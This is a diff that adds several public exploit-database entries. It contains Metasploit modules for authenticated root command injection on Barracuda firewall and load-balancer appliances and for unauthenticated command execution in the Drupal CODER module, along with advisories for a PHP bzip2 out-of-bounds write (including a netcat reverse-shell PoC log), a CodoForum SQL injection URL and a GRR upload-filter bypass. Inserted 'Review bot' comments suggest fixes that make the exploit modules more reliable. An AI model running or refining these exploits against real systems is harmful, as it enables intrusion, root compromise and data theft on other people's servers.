+ }, + 'Author' => + [ + 'xort', # vuln + metasploit module + ], + 'Version' => '$Revision: 2 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl" + } + ], + + ['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd" + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('ET', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'headers' => + { + 'Accept' => "application/json, text/javascript, */*; q=0.01", + 'Content-Type' => "application/x-www-form-urlencoded", + 'X-Requested-With' => "XMLHttpRequest" + }, + 'vars_post' => + { + + 'enc_key' => enc_key, + 'et' => et, + 'user' => "admin", # username, + 'password' => "admin", # password_clear, + 'enctype' => "none", + 'password_entry' => "", + 'login_page' => "1", + 'login_state' => "out", + 'real_user' => "", + 'locale' => "en_US", + 'form' => "f", + 'Submit' => "Sign in", + } + }, timeout) + + # get rid of first yank + password = 
res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + vprint_status( "Running Command...\n" ) + + sudo_cmd_exec = target.SudoCmdExec + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + # random filename to dump too + 'tmp' HAS to be here. + dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + injection_string = "printf \"#{encoded_cmd}\" > #{dumpfile} ; /bin/chmod +x #{dumpfile} ; #{sudo_run_cmd_1} ; #{sudo_run_cmd_2} #{dumpfile} ; rm #{dumpfile}" + + exploitreq = [ + [ "auth_type","Local" ], + [ "et",et ], + [ "locale","en_US" ], + [ "password", password ], + [ "primary_tab", "BASIC" ], + [ "realm","" ], + [ "secondary_tab","reports" ], + [ "user", username ], + [ "timestamp", Time.now.to_i ], + + [ "scope", "" ], + [ "scope_data", "; #{injection_string} ;" ], # vuln + [ "modify_admin_role", "" ] + + ] + + + boundary = "---------------------------" + Rex::Text.rand_text_numeric(34) + + post_data = "" + + exploitreq.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + post_data << "--#{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'Accept-Language' => "en-US,en;q=0.5" + } + }) + + end + + def run_script(username, password, et, cmds) + vprint_status( "running 
script...\n") + + + end + + def exploit + # timeout + timeout = 1550; + + user = "admin" + + # params + real_user = ""; + login_state = "out" + et = Time.now.to_i + locale = "en_US" + user = "admin" + password = "admin" + enctype = "MD5" + password_entry = "" + password_clear = "admin" + + + password_hash, et = do_login(user, password_clear, et) + vprint_status("new password: #{password_hash} et: #{et}\n") + + sleep(5) + + + # if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + + handler + end + + + end + +end diff --git a/platforms/linux/remote/40147.rb b/platforms/linux/remote/40147.rb new file mode 100755 index 000000000..8792f301a --- /dev/null +++ b/platforms/linux/remote/40147.rb 
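Review bot: `do_login` ignores its `username` and `password_clear` arguments — the POST body hardcodes `'user' => "admin"` and `'password' => "admin"` with the real values left in trailing comments — and `exploit` likewise hardcodes `user = "admin"` and `password_clear = "admin"`, so the registered `USERNAME` and `PASSWORD` options are never consulted. The `update_info` hash lists `'Privileged'` twice (`true`, then `false`); Ruby keeps the last duplicate key, so the module silently declares itself unprivileged — remove one of them. In `do_login`, `res` from `send_request_cgi` is dereferenced as `res.body` without a nil check, and `split('\n')` uses a single-quoted literal, so it splits on the two characters backslash-n rather than a newline and presumably only works because the following `grep` still matches against the whole body. `run_script` is an empty stub with an unused `cmds` parameter, and the `ET` and `USERNAME` options carry the copy-pasted description `'Device password'`.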
@@ -0,0 +1,169 @@
+# Exploit Title: Barracuda Spam & Virus Firewall Post Auth Remote Root Exploit
+# Date: 07/21/16
+# Exploit Author: xort xort@blacksecurity.org
+# Vendor Homepage: https://www.barracuda.com/
+# Software Link: https://www.barracuda.com/landing/pages/spamfirewall/
+# Version: Spam and Virus Firewall <= 5.1.3.007
+# Tested on: Spam & Virus Firewall 5.1.3.007
+# CVE : None.
+
+require 'msf/core'
+require 'date'
+require "base64"
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Barracuda Spam & Virus Firewall (bdump.cgi) Post Auth Root Exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Barracuda Spam & Virus firewall firmware version <= 5.1.3.007 by exploiting a
+ vulnerability in the web administration interface.
+ By sending a specially crafted request it's possible to inject system
+ commands while escalating to root do to relaxed sudo configuration on the local
+ machine.
+ }, + 'Author' => [ 'xort' ], # disclosure and exploit module + 'References' => [ [ 'none', 'none'] ], + 'Platform' => [ 'linux'], + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, + 'Targets' => [['Spam Firewall firmware: 5x', {}]], + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Password', "admin" ]), + OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'vars_post' => + { + 'password_clear' => password_clear, + 'real_user' => "", + 'login_state' => "out", + 'enc_key' => enc_key, + 'et' => et, + 'locale' => "en_US", + 'user' => username, + 'password' => Digest::MD5.hexdigest(username+enc_key), + 'enctype' => "MD5", + 'password_entry' => "", + } + }, timeout) + + # get rid of first yank + password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + + # file to replace + sudo_cmd_exec = "/home/product/code/firmware/current/bin/mysql_add_cluster_user.sh" + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + vprint_status( "Running Command...\n" ) + + # random filename to dump too + 'tmp' HAS to be here. 
+ b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + # decoder stubs - tells 'base64' command to decode and dump data to temp file + b64decode1 = "echo \"" + b64decode2 = "\" | base64 -d >" + b64dumpfile + + # base64 - encode with base64 so we can send special chars and multiple lines + cmd = Base64.strict_encode64(cmd) + + # Create injection string. + # a) package the base64 decoder with encoded bytes + # b) attach a chmod +x request to make the script created (b64dumpfile) executable + # c) execute decoded base64 dumpfile + + injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile + + vprint_status( "sending..." ) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/cgi-mod/bdump.cgi", + 'headers' => + { + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Accept-Language' => "en-US,en;q=0.5" + }, + 'vars_get' => { + 'password' => password, + 'et' => et, + 'user' => username, + 'role' => 'admin', + '_dc' => '', + 'bdb' => '`' + injection_string + '`', + 'locale' => 'en_US' + } + }) + end + + def exploit + + # params + timeout = 1550; + + real_user = ""; + et = Time.now.to_i + user = datastore['USERNAME'] + password = datastore['PASSWORD'] + + # do login and get password hash + password_hash, et = do_login(user, password, et) + vprint_status("got password hash: #{password_hash}\n") + sleep(2) + + # clean up hanging prior request + run_command(user, password_hash, et, ("ps -df|grep bdump|awk '{print $2}' | xargs kill -9")) + sleep(5) + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? 
+ + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + + handler + end + end +end diff --git a/platforms/php/dos/40155.txt b/platforms/php/dos/40155.txt new file mode 100755 index 000000000..64b634900 --- /dev/null +++ b/platforms/php/dos/40155.txt 
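Review bot: In `do_login` the two `res.body.split('\n')` calls use a single-quoted `'\n'`, which in Ruby is the two characters backslash and n rather than a newline, so the body is never split into lines and each `grep` regex runs against the whole response as a single element; it only works because the patterns are unanchored, and `res.body.lines` (or `split("\n")`) expresses what is meant. The same lines dereference `res` without a check, and `send_request_cgi` returns nil on a timeout or refused connection, so an unreachable appliance ends in a NoMethodError instead of a clear failure; a guard such as `fail_with(Failure::Unreachable, 'No response to login request') unless res && res.body` before the parsing would give the operator a meaningful message. `exploit` then passes `password_hash` straight into `run_command` and discards every response, so a failed login (nil hash from the regex) is indistinguishable from a failed injection; a nil check after `do_login` would cover the common case. The `'References' => [ [ 'none', 'none'] ]` entry is not a reference type the framework knows and should be removed or replaced with a real URL, and the unused locals `timeout` and `real_user` in `do_login`/`exploit` are leftovers from the copied module.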
@@ -0,0 +1,324 @@ +PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in +its `bzread()' function: + +php-7.0.8/ext/bz2/bz2.c +,---- +| 364 static PHP_FUNCTION(bzread) +| 365 { +| ... +| 382 ZSTR_LEN(data) = php_stream_read(stream, ZSTR_VAL(data), ZSTR_LEN(data)); +| 383 ZSTR_VAL(data)[ZSTR_LEN(data)] = '\0'; +| 384 +| 385 RETURN_NEW_STR(data); +| 386 } +`---- + +php-7.0.8/ext/bz2/bz2.c +,---- +| 210 php_stream_ops php_stream_bz2io_ops = { +| 211 php_bz2iop_write, php_bz2iop_read, +| 212 php_bz2iop_close, php_bz2iop_flush, +| 213 "BZip2", +| 214 NULL, /* seek */ +| 215 NULL, /* cast */ +| 216 NULL, /* stat */ +| 217 NULL /* set_option */ +| 218 }; +`---- + +php-7.0.8/ext/bz2/bz2.c +,---- +| 136 /* {{{ BZip2 stream implementation */ +| 137 +| 138 static size_t php_bz2iop_read(php_stream *stream, char *buf, size_t count) +| 139 { +| 140 struct php_bz2_stream_data_t *self = (struct php_bz2_stream_data_t *)stream->abstract; +| 141 size_t ret = 0; +| 142 +| 143 do { +| 144 int just_read; +| ... +| 148 just_read = BZ2_bzread(self->bz_file, buf, to_read); +| 149 +| 150 if (just_read < 1) { +| 151 stream->eof = 0 == just_read; +| 152 break; +| 153 } +| 154 +| 155 ret += just_read; +| 156 } while (ret < count); +| 157 +| 158 return ret; +| 159 } +`---- + +The erroneous return values for Bzip2 are as follows: + +bzip2-1.0.6/bzlib.h +,---- +| 038 #define BZ_SEQUENCE_ERROR (-1) +| 039 #define BZ_PARAM_ERROR (-2) +| 040 #define BZ_MEM_ERROR (-3) +| 041 #define BZ_DATA_ERROR (-4) +| 042 #define BZ_DATA_ERROR_MAGIC (-5) +| 043 #define BZ_IO_ERROR (-6) +| 044 #define BZ_UNEXPECTED_EOF (-7) +| 045 #define BZ_OUTBUFF_FULL (-8) +| 046 #define BZ_CONFIG_ERROR (-9) +`---- + +Should the invocation of BZ2_bzread() fail, the loop would simply be +broken out of (bz2.c:152) and execution would continue with bzread() +returning RETURN_NEW_STR(data). + +According to the manual [1], bzread() returns FALSE on error; however +that does not seem to ever happen. 
+ +Due to the way that the bzip2 library deals with state, this could +result in an exploitable condition if a user were to call bzread() after +an error, eg: + +,---- +| $data = ""; +| while (!feof($fp)) { +| $res = bzread($fp); +| if ($res === FALSE) { +| exit("ERROR: bzread()"); +| } +| $data .= $res; +| } +`---- + + +Exploitation +============ + +One way the lack of error-checking could be abused is through +out-of-bound writes that may occur when `BZ2_decompress()' (BZ2_bzread() +-> BZ2_bzRead() -> BZ2_bzDecompress() -> BZ2_decompress()) processes the +`pos' array using user-controlled selectors as indices: + +bzip2-1.0.6/decompress.c +,---- +| 106 Int32 BZ2_decompress ( DState* s ) +| 107 { +| 108 UChar uc; +| 109 Int32 retVal; +| ... +| 113 /* stuff that needs to be saved/restored */ +| 114 Int32 i; +| 115 Int32 j; +| ... +| 118 Int32 nGroups; +| 119 Int32 nSelectors; +| ... +| 167 /*restore from the save area*/ +| 168 i = s->save_i; +| 169 j = s->save_j; +| ... +| 172 nGroups = s->save_nGroups; +| 173 nSelectors = s->save_nSelectors; +| ... +| 195 switch (s->state) { +| ... +| 286 /*--- Now the selectors ---*/ +| 287 GET_BITS(BZ_X_SELECTOR_1, nGroups, 3); +| 288 if (nGroups < 2 || nGroups > 6) RETURN(BZ_DATA_ERROR); +| 289 GET_BITS(BZ_X_SELECTOR_2, nSelectors, 15); +| 290 if (nSelectors < 1) RETURN(BZ_DATA_ERROR); +| 291 for (i = 0; i < nSelectors; i++) { +| 292 j = 0; +| 293 while (True) { +| 294 GET_BIT(BZ_X_SELECTOR_3, uc); +| 295 if (uc == 0) break; +| 296 j++; +| 297 if (j >= nGroups) RETURN(BZ_DATA_ERROR); +| 298 } +| 299 s->selectorMtf[i] = j; +| 300 } +| 301 +| 302 /*--- Undo the MTF values for the selectors. ---*/ +| 303 { +| 304 UChar pos[BZ_N_GROUPS], tmp, v; +| 305 for (v = 0; v < nGroups; v++) pos[v] = v; +| 306 +| 307 for (i = 0; i < nSelectors; i++) { +| 308 v = s->selectorMtf[i]; +| 309 tmp = pos[v]; +| 310 while (v > 0) { pos[v] = pos[v-1]; v--; } +| 311 pos[0] = tmp; +| 312 s->selector[i] = tmp; +| 313 } +| 314 } +| 315 +| ... 
+| 613 save_state_and_return: +| 614 +| 615 s->save_i = i; +| 616 s->save_j = j; +| ... +| 619 s->save_nGroups = nGroups; +| 620 s->save_nSelectors = nSelectors; +| ... +| 640 return retVal; +| 641 } +`---- + +bzip2-1.0.6/decompress.c +,---- +| 070 #define GET_BIT(lll,uuu) \ +| 071 GET_BITS(lll,uuu,1) +`---- + +bzip2-1.0.6/decompress.c +,---- +| 043 #define GET_BITS(lll,vvv,nnn) \ +| 044 case lll: s->state = lll; \ +| 045 while (True) { \ +| ... +| 065 } +`---- + +If j >= nGroups (decompress.c:297), BZ2_decompress() would save its +state and return BZ_DATA_ERROR. If the caller don't act on the +erroneous retval, but rather invokes BZ2_decompress() again, the saved +state would be restored (including `i' and `j') and the switch statement +would transfer execution to the BZ_X_SELECTOR_3 case -- ie. the +preceding initialization of `i = 0' and `j = 0' would not be executed. + +In pseudocode it could be read as something like: + +,---- +| i = s->save_i; +| j = s->save_j; +| +| switch (s->state) { +| case BZ_X_SELECTOR_2: +| s->state = BZ_X_SELECTOR_2; +| +| nSelectors = get_15_bits... +| +| for (i = 0; i < nSelectors; i++) { +| j = 0; +| while (True) { +| goto iter; +| case BZ_X_SELECTOR_3: +| iter: +| s->state = BZ_X_SELECTOR_3; +| +| uc = get_1_bit... +| +| if (uc == 0) goto done; +| j++; +| if (j >= nGroups) { +| retVal = BZ_DATA_ERROR; +| goto save_state_and_return; +| } +| goto iter; +| done: +| s->selectorMtf[i] = j; +`---- + +An example selector with nGroup=6: +,---- +| 11111111111110 +| ||||| `|||||| `- goto done; s->selectorMtf[i] = 13; +| `´ j++; +| j++; goto save_state_and_return; +| goto iter; +`---- + +Since the selectors are used as indices to `pos' in the subsequent loop, +an `nSelectors' amount of <= 255 - BZ_N_GROUPS bytes out-of-bound writes +could occur if BZ2_decompress() is invoked in spite of a previous error. 
+ +bzip2-1.0.6/decompress.c +,---- +| 304 UChar pos[BZ_N_GROUPS], tmp, v; +| 305 for (v = 0; v < nGroups; v++) pos[v] = v; +| 306 +| 307 for (i = 0; i < nSelectors; i++) { +| 308 v = s->selectorMtf[i]; +| 309 tmp = pos[v]; +| 310 while (v > 0) { pos[v] = pos[v-1]; v--; } +| 311 pos[0] = tmp; +| 312 s->selector[i] = tmp; +| 313 } +`---- + +bzip2-1.0.6/bzlib_private.h +,---- +| 121 #define BZ_N_GROUPS 6 +`---- + + +PoC +=== + +Against FreeBSD 10.3 amd64 with php-fpm 7.0.8 and nginx from the +official repo [2]: + +,---- +| $ nc -v -l 1.2.3.4 5555 & +| Listening on [1.2.3.4] (family 0, port 5555) +| +| $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php +| [*] sending archive to http://target/upload.php (0) +| +| Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479) +| $ fg +| id +| uid=80(www) gid=80(www) groups=80(www) +| +| uname -imrsU +| FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000 +| +| /usr/sbin/pkg query -g "=> %n-%v" php* +| => php70-7.0.8 +| => php70-bz2-7.0.8 +| +| cat upload.php +| +`---- + + +Solution +======== + +This issue has been assigned CVE-2016-5399 and can be mitigated by +calling bzerror() on the handle between invocations of bzip2. + +Another partial solution has been introduced in PHP 7.0.9 and 5.5.38, +whereby the stream is marked as EOF when an error is encountered; +allowing this flaw to be avoided by using feof(). However, the PHP +project considers this to be an issue in the underlying bzip2 +library[3]. + + + +Footnotes +_________ + +[1] [https://secure.php.net/manual/en/function.bzread.php] + +[2] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-5399] + +[3] [https://bugs.php.net/bug.php?id=72613] + + +-- Hans Jerry Illikainen \ No newline at end of file diff --git a/platforms/php/webapps/40149.rb b/platforms/php/webapps/40149.rb new file mode 100755 index 000000000..46593ba39 --- /dev/null +++ b/platforms/php/webapps/40149.rb 
@@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Drupal CODER Module Remote Command Execution', + 'Description' => %q{ + This module exploits a Remote Command Execution vulnerability in + Drupal CODER Module. Unauthenticated users can execute arbitrary command + under the context of the web server user. + + CODER module doesn't sufficiently validate user inputs in a script file + that has the php extension. A malicious unauthenticated user can make + requests directly to this file to execute arbitrary command. + The module does not need to be enabled for this to be exploited + + This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicky Bloor', # discovery + 'Mehmet Ince ' # msf module + ], + 'References' => + [ + ['URL', 'https://www.drupal.org/node/2765575'] + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 225, + 'DisableNops' => true, + 'BadChars' => "\x00\x2f", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat netcat-e' + }, + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Jul 13 2016', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']), + OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']), + OptPort.new('SRVPORT', [true, 'Bogus web server port to listen']) + ] + ) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), + ) + if res && res.code == 200 + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def on_request_uri(cli, _request) + print_status("Incoming request detected...") + p = '' + p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}' + p << 's:11:"theme_cache";s:16:"theme_cache_test";' + p << 's:9:"variables";s:14:"variables_test";' + p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}' + p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}' + p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";' + p << 's:7:"new_dir";s:' + p << (payload.encoded.length + 14).to_s + p << ':"f --help && ' + p << payload.encoded + p << ' #";s:4:"name";s:4:"test";}}}' + print_status("Sending payload...") + send_response(cli, p) + end + + def exploit + start_service + send_request_cgi( + 'method' => 'GET', + 'uri' => 
normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), + 'encode_params' => false, + 'vars_get' => { + 'file' => get_uri + } + ) + stop_service + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40150.txt b/platforms/php/webapps/40150.txt new file mode 100755 index 000000000..037cdb8a3 --- /dev/null +++ b/platforms/php/webapps/40150.txt @@ -0,0 +1,35 @@ +1. Advisory Information +======================================== +Title : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability +Vendor Homepage : https://codoforum.com/ +Remotely Exploitable : Yes +Versions Affected : Prior to 3.2.1 +Tested on : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5 +Vulnerability : SQL Injection (Critical/High) +Date : 23.07.2016 +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman + + +3. Description +======================================== +The script that parses the request URL and displays user profile depending on +the retrieved id does not use proper input validation against SQL injection. + + +4. TECHNICAL DETAILS & POC +======================================== +SQL Injection Proof of Concept +---------------------------------------- +Example for fetching current user database: +http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610))) + + +5. SOLUTION +======================================== +Upgrade to the latest version v3.4 build 19 + diff --git a/platforms/php/webapps/40153.txt b/platforms/php/webapps/40153.txt new file mode 100755 index 000000000..74869cf7e --- /dev/null +++ b/platforms/php/webapps/40153.txt 
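Review bot: `check` in this hunk returns `Appears` for any HTTP 200 on the `coder_upgrade.run.php` path, which a front controller or a "friendly" 404 page can also produce, so unaffected hosts will be reported as vulnerable; matching something specific to that script's output in `res.body` would make the verdict meaningful, and a nil `res` currently maps to `Safe` where `Exploit::CheckCode::Unknown` is the honest answer for an unreachable target. In `exploit` the result of `send_request_cgi` is discarded and `stop_service` is called immediately afterwards, so a target that never fetches `get_uri`, or fetches it late, fails silently; inspecting the response and deferring `stop_service` until the callback was served would make that visible. The length prefix `payload.encoded.length + 14` in `on_request_uri` is correct for the 12-byte `f --help && ` prefix plus the 2-byte ` #` suffix but is easy to break when either literal is edited; a comment `# 14 = 'f --help && ' (12) + ' #' (2)` next to it would help. `on_request_uri` also answers every request path with the serialized payload, so presumably any client probing the listener receives it; comparing the request URI against the registered resource before calling `send_response` would limit delivery to the expected callback.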
@@ -0,0 +1,183 @@ +# Exploit Title: GRR <= 3.0.0-RC1 (all versions) RCE with privilege escalation through file upload filter bypass (authenticated) + +# Date: January 7th, 2016 +# Exploit Author: kmkz (Bourbon Jean-marie) | @kmkz_security +# Vendor Homepage: http://grr.devome.com/fr/ +# Software Link: http://grr.devome.com/fr/telechargement/category/3-versions-patch?download=7:grr-3-0-0-rc1 +# Version: 3.0.0-RC1 +# Tested on: Windows 2003 R2, PHP 5.2.6 +# Dork: inurl:/grr/ intext:réservation intitle:"GRR" + +# CVSS score: 9.9 +# OVE ID: OVE-20160705-0044 +# CVE ID: Not Requested + +# Credits: http://www.kaizendo.fr/php-how-to-manage-uploaded-image-in-secure-way/ +# Fix: https://github.com/JeromeDevome/GRR/blob/master/admin/admin_config1.php + + +I. APPLICATION +====================================================================================== + +GRR is an open source resources manager tool used in many french public +institutions (not only!). +It permit for example to manage rooms reservations, and so much more. + + +II. ADVISORY +====================================================================================== + + +The application allows administrators to change the enterprise's logo +uploading a new image with .png,.jpg or .gif extension only. + +Once uploaded, image name is "splitted" in an array and renamed with the +name "logo" followed by the extention saved as 2nd array's element. + +This file called for example "logo.jpg" is also "chmoded" as 0666 permission +and directly accessible in image folder (img_grr by default) by all users. + +Besides, the application does only a basic conditional php test +on the extension of the uploaded file. + +It's possible for an attacker to add a second extension that will be +used when the image will be renamed in order to bypass this basic filter +(double extension upload filter bypassing). 
+ +So, a file called backdoor.php.jpg will be renamed as logo.php with +chmod 0666 permissions and could be used by attacker to gain more privileges +on the targeted server (privesc due to bad file permissions and RCE). + +To trigger this vulnerability it is necessary to have an administrator +account on the GRR application. + +This vulnerability is a combination of 3 issues: +- predictable uploaded file names and path +- upload of any kind of file +- bad files permission when we upload this file that permit us to gain +privilegied access. + +Note that it could be "dorkable" in order to find targets ... and sometimes +with trivial admin credentials ;-). + +III. VULNERABLE CODE +====================================================================================== + +snip.. +// Enregistrement du logo + $doc_file = isset($_FILES["doc_file"]) ? $_FILES["doc_file"] : NULL; + if (preg_match("`\.([^.]+)$`", $doc_file['name'], $match)) + { + $ext = strtolower($match[1]); + if ($ext != 'jpg' && $ext != 'png' && $ext != 'gif') // Vulnerability !! Extension are the only "security" test on submitted files !! + { + $msg .= "L\'image n\'a pas pu être enregistrée : les seules extentions autorisées sont gif, png et jpg.\\n"; + $ok = 'no'; +} +else +{ + $dest = '../images/'; + $ok1 = false; + if ($f = @fopen("$dest/.test", "w")) + { + @fputs($f, '<'.'?php $ok1 = true; ?'.'>'); // Hem... + @fclose($f); + include("$dest/.test"); + } + if (!$ok1) + { + $msg .= "L\'image n\'a pas pu être enregistrée : problème d\'écriture sur le répertoire \"images\". Veuillez signaler ce problème à l\'administrateur du serveur.\\n"; + $ok = 'no'; + } + else + { + $ok1 = @copy($doc_file['tmp_name'], $dest.$doc_file['name']); + if (!$ok1) + $ok1 = @move_uploaded_file($doc_file['tmp_name'], $dest.$doc_file['name']); + if (!$ok1) + { + $msg .= "L\'image n\'a pas pu être enregistrée : problème de transfert. Le fichier n\'a pas pu être transféré sur le répertoire IMAGES. 
